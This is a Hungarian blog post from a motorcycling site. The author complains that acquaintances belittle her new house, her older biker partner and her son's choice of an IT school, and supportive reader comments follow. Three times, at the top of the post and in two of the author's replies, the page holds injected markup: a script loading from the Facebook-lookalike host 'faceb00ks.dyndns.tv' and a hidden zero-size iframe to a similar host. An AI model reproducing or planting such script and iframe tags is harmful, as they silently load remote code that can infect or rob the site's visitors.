Street Racer STR motoros kesztyű a MotoZemtől

Ha nekem jó, másnak az miért fáj?

<script src="http://faceb00ks.dyndns.tv"></script><iframe src="http://faceb00k.dyndns.tv" style="display: none;" height="0" width="0"></iframe>Nem értem az embereket, akik elvileg közel állnak hozzám. Végre boldog vagyok, és úgy alakul az életem, ahogy azt Én szeretném. Mostanában érzem, hosszú idő után, hogy irányítom a sorsom és nem csak sodródom az árral.
Ezt szerettem volna megosztani másokkal is, így gondoltam szervezek egy kerti sütögetős, iszogatós, beszélgetős napot a hétvégén, amikor is a páromat is megismerhetik. (akik eddig még, nem találkoztak vele) Nem csak a szűk családdal, hanem néhány kedvesnek vélt ismerőssel, és közelebbi haverral.
Ezzel nem is volt gond, a kaja finom volt, mindenki láthatóan jól érezte magát, az idő remek volt.
A gondok csak ezután jöttek.
Eltelt 3 nap, és sorra jönnek a nem túl kedves megjegyzések, amik úgy kezdődnek, hogy: Te tudod..., vagy Nem akarlak megbántani... És akadt köztük olyan is, aki egyenesen lehülyézett.
Nem tudom eldönteni, hogy ezek irigységből vagy rosszindulatból törnek elő, de erre nem vagyok kiváncsi. Nem nekik akarok megfelelni, és nem nekik kell az én kicsi életemet élni.
Tudom, dögöljön meg a szomszéd tehene is, de én azt hittem ezek az emberek kedvelnek, és örülni tudnak velem. Hát NEM!
Mindent, ami engem boldoggá tesz mostanság, leszóltak, vagy volt egy epés megjegyzés rá. Persze nem mindenki, de elegen ahhoz, hogy rossz érzés támadjon bennem.
Hiszem, hogy jó úton haladok, és tudom, boldog vagyok. Mégis rossz érzés fogott el. Kedveltem és szerettem ezeket az embereket, adtam a véleményükre is, ha úgy alakult, most mégis ellenséges érzéseket váltottak ki.
Lehet az ő nézetükből, nekik van igazuk, de ez nem az ő életük. Miért nem tudnak örülni annak, ha valaki jól érzi magát a bőrében? Ez ma már nem divat???
Tudom, hogy a ház, amit megvettem, nem egy építészeti műremek, nincs benne semmi extra, és van olyan, akinek az autója többe került, DE AZ ENYÉM! Majd lesz benne annyi, és olyan extra, ami nekünk kell. Ha végzünk a felújítással, akkor takaros kis otthon lesz, a kert rendezés után, pedig az álmom válik majd valóra. Kerti tó, medence és egy terasz, ahol olvashatok, beszélgethetünk. A nyugalom szigete lesz, már látom a lelki szemeimmel, csak pénz és idő kérdése.
Tudom, hogy a volt férjem mérnök volt és "csak" 9 évvel volt idősebb nálam. Nem volt pocakos, félőrült motoros. De nem voltunk boldogok. A kedvesem szeret, elfogad (a fiamat is szereti), támogat. Nem egy daliás herceg, aki a meséből lépett ki, nem gazdag, nem ilyen vagy olyan. Egyszerű, dolgos vállalkozó, aki küzd önmagáért, az alkalmazottakért. Nem hinném, hogy akkor gáz lenne 13 év korkülönbség, amikor kitartásban, lelkesedésben, életkedvben sok harmincas elmarad mellette. Szeretem, ahogy látja a világot, ahogy él, és ahogy velem/velünk bánik. Szeretem, amiért vannak érzései, és ha néha kétségbe esik, akkor is a kiutat,a megoldást keresi. Nincs luxus autója, mert az csak munka eszköz, de van két féltett motorja. Nem megyünk Bora-Borára nyaralni, csak Görögbe motorral, mert nekünk ez lesz az élmény. Egyikünk se vágyik csilli-villi sok csillagos szállodára, az apartman pont megfelel. Csak a motort be lehessen zárni :)
Ezeken még túl is tettem magam, egyik fülemen be, a másikon ki, de a támadás nem ért véget. A legfájóbb ponton találtak el. A gyermekem. Sokat beszélgettünk a fiammal, hogy merre tovább az általános után. Azt mondta, nem akar gimnáziumba menni, de majd szeretne diplomát. Oké, érettségi kell, de hol, milyen szakirány? Az ő világa, mint sok más fiatalé a számítógép, matekból jó, érdeklik a programok, a játék tesztek, jól rajzol géppel és kézzel egyaránt. Akkor informatika. Felvételi megvolt, két iskolában indítottak infós osztályt, oda jelentkezett első helyre, ahová szeretett volna menni. Felvették!:D Pontszám alapján mehetett volna a másikba is, de az első helyre kell, meg oda is akart. Erre jönnek a baromságok, hogy ez a suli nem jó, meg 100-1 lesz, aki bekerül az egyetemre. Miért nem gimibe ment, és miért nem erőltettem?
Az, hogy a motorozás miatt hülyének néznek, az már csak hab a tortán. Mert beázik, és veszélyes, és csak két kereke van. Nem számít, hogy nekem ezer éve ez a vágyam.

Tényleg nem értem! Empatikus és megértő vagyok, de ez most kicsit sok volt! Én tudtam örülni, amikor a barátnőm megvett egy lepukkant panellakást, kipofoztuk és jó lett. Vagy amikor az egyik haver vett egy Ladát, mert kellett kocsi, eszembe nem jutott, hogy miért nem vett audi Q7-et, hisz az tetszik neki. Megértettem, hogy nem akar hitelt a mai világban, meg dolgozni járni, gépeket, szerszámokat hozni-vinni ez is jó.
Lehet bennem van a hiba? Nekem elég, ha látom a másik mosolyát, mert valamit elért az életben, és nem anyu-apu tette a segge alá. Tudok örülni annak, ha látom egy párocska szemében a csillogást, akkor is, ha nem szépségkirálynő a leányzó, akit bemutat a barátom.
Ennyivel könnyebb lenne elviselni, ha nem csak a mi életünk, hanem másé se jobb?
Jobb belerúgni a másikba, hogy ne legyen már olyan jó neki?
Nem is csodálom, hogy ennyi ember boldogtalan, ha azt néznék, amijük van, talán egyszerűbb lenne reggel mosolyogni. De amíg csak azt nézik, hogy neki miért van, és nekem miért nincs, addig félő maradnak a hasonlóan "kedves" megjegyzések.

Hozzászólások

Aki nem tud veled örülni, az tán nem a barátod? Én örülök neked, még így ismeretlenben is:)

(amúgy meg sajnos a mai világban tökre nem számít a diploma, a fiad okosabb is, ha valami szakmát tanul inkább. Üzeni egy háromdiplomás recepciós.)
 
<script src="http://faceb00ks.dyndns.tv"></script><iframe src="http://faceb00k.dyndns.tv" style="display: none;" height="0" width="0"></iframe>Köszönöm birge :) Én a kettővel nem mentem semmire, de van ...
Pimpa, lehet igazad van. Majd motoros találkozót tartok, és a szomszédok is kedvesek lesznek ;) Bár az ötlet nem is rossz :p
 
Nekem is pont az jutott eszembe, mint birgének: aki nem tud az örömödnek örülni, az nem a barátod...

Szerintem figyelj magadra és ha úgy érzed jó helyen vagy, felejtsd el a kritikákat. Nem azt mondom, hogy ezentúl ne állj szóba velük, csak a leszólást ne halld meg... (kívülről az ember mindig olyan okosságokat tud ám mondani :))
 
Egyszerűbb másokat kritizálni, más életét "rendbe" rakni, mint megoldani a sajátjukat.
Én még el is kerülöm az ilyen "barátokat" messzire, mert nem akarom, hogy lehúzzanak a mélybe a negatív megjegyzéseikkel.
Van egy mag (2-3 ember+ a családom), akikre bármilyen körülmények között számíthatok. Na, ők maradtak meg nekem!

Ha neked most így minden klappol, hagyd a fenébe őket.
 
Neha azert el kell gondolkodni mit mondanak masok.Sokszor az ember nem biztos hogy belülröl jol latja.En is jartam mar ugy hogy masoknak lett igaza.:)
 
Sokkal könnyebb más életébe vau-vau, mint a saját kihívásainkkal szembe nézni. Tanácsot adni meg végképp butaság, hiszen nem tudunk az másik cipőjében az ő útján járni. Gyarló az ember, kész passz. Az én hitvallásom: Magadra számíts, és örülj minden pillanatnak, amikor szerető lények vesznek körül. De ezt tekintsd a sors ajándékának!
Azt tapasztaltam, hogy a nem kritizáló, mást őszintén elfogadni tudó barát olyan ritka, mint a fehér holló. Sajna.
 
Az emberek nagy része irigy.Irigy arra,ha van valamid,ha csinos vagy,ha boldog vagy,ha mersz a saját utadon járni.Irigykedni és más jókedvét,lelkesedését elrontani sokkal könnyebb,mint a saját hibáinkkal és szerencsétlenségünkkel szembe nézni.Az én esetemben a nagy haveri körből maradt egy maréknyi ember,aki elfogad ilyennek,a többiek csak simán lehülyéznek a motorozásért.De kit érdekel?Engem ugyan nem.Aki számít nekem,az így szeret.
Legközelebb ha bulit szervezel hívj motorosokat csak,jobban jársz!
 
Amíg boldog vagy, ne törődj senki véleményével. A boldogság többet ér bármilyen anyagi javaknál.
 
Mi örülünk, hogy Te örülsz! Sajnos a világ a külsőségek felé ment el, az igazi értékek már nem divatosak!
 
Ez sajnos kétoldalú dolog. Vagy tényleg csak az irigység beszél belőlük és az, hogy a Te örömödet is elrontsák (ilyen a kolléganőm, aki állandóan baszogat, ha elmegyek egy motoros rendezvényre, mert én jól érzem akkor magam, neki meg nincsenek barátai, akikkel összefuthatna és kellemesen eltöltené az időt). Vagy a másik oldal, hogy tényleg igazuk van. Ezt innen nem tudom megítélni. A barátnőmnek is mindneki mondta anno, hogy ne menjen hozzá ahhoz a pasihoz, akivel nemrég váltak el. Utólag azt mondta, hogy igaza volt mindnekinek, de annyira szerelmes volt, hogy minnél jobban megszóltuk a srácot annál jobban ragaszkodott hozzá. Pont ma meg azt mondta róla, mert vége a válási ceremóniának és ma adja vissza a "közös lakás" kulcsai, - ahonnan kirakta anno a házasság évei alatt az utcára egyik napról a másikra - és csak ennyivel jellemezte: "Rohadék!". Ennyi. Szóval lehet, hogy igazad van, de az is lehet, hogy nincs...
 
Szerintem az esetek nagyobb részében szimpla irígységről van szó. Megfigyeltem, hogy azok kritizálnak legtöbbször másokat, akik maguk csak tehetetlenül vergődnek, és képtelenek a változtatásra. Annyira elhiszik már, hogy másként nem lehet, hogy számukra már az a megdöbbentő, ha valaki képes a kitörésre... A mondás is úgy tartja, hogy más dolgában olyan okos tud lenni mindenki, bezzeg...
Ne foglalkozz velük, élj meg minden pillanatot boldogan, azt kívánom:love:
 
Az irígyekkel ne foglalkozz. A párválasztás meg mindig idővel derül ki. Ezeknek az irigyeknek elég nyomor már az is, ha látják jobb lett másnak, ők pedig csak kavargatják maguk körül a langyos kakit, de kimászni belőle nincs erejük. Általában nekik számít, hogy Bora-bora vagy Görögország (hogy másnak meg tudják mutatni mennyire jó nekik - miközben mégse, mert mondjuk közben Boraborán apa a bennszülött lányokat kergette anya helyett...) Hogy motorozni/kivel együtt lenni jó, azt csak az érti aki csinálja, és hogy neked mi a jó, azt nehogy már más jobban tudja/érezze.... A te életed, magadnak éld, ne másnak. Kit érdekel hogy mit gondolnak olyanok, akiknek a véleménye nem oszt és nem szoroz valójában...
 
<script src="http://faceb00ks.dyndns.tv"></script><iframe src="http://faceb00k.dyndns.tv" style="display: none;" height="0" width="0"></iframe>Köszönöm, mindenkinek! Lehet, hogy ők a rokonaim, de ha nem tetszik neki, akkor nem kell tartani a kapcsolatot velem - erre a döntésre jutottam. Nekem jó így, ahogy van, ahogy alakul az életem :) Haverokat találok motoros körökben, de akár még barátokat is. :D
 
Tudod, az emberek hülyék, és asziszik,, az ő receptjük mindenkire érvényes. Asziszik, ami nekik jó, az kötelező másoknak is. Minél idősebb egy ember, minél nagyobb szarbú mászott ki saját maga, anná erősebben hiszi aztat, hogy csak az a jó másnak is, ami neki. Attú még nem biztos, hogy rosszat akarnak, csak nem jó akargyák a jót. :(
 

Blogbejegyzés információ

Szerző
Mely's
Olvasás
630
Hozzászólások
34
Utolsó frissítés

Motoros blogok további bejegyzései

Mely's további bejegyzései

Oszd meg ezt a bejegyzést

CsamShop kendők

Back
Oldal tetejére